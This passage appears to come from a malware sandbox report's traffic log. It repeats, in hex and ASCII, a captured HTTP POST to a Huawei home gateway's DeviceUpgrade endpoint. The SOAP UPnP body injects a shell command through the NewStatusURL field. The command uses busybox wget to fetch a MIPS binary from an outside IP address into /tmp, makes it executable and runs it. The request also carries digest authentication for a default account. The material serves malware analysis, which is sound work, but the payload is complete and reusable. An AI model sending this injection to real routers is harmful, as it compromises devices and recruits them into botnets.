62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 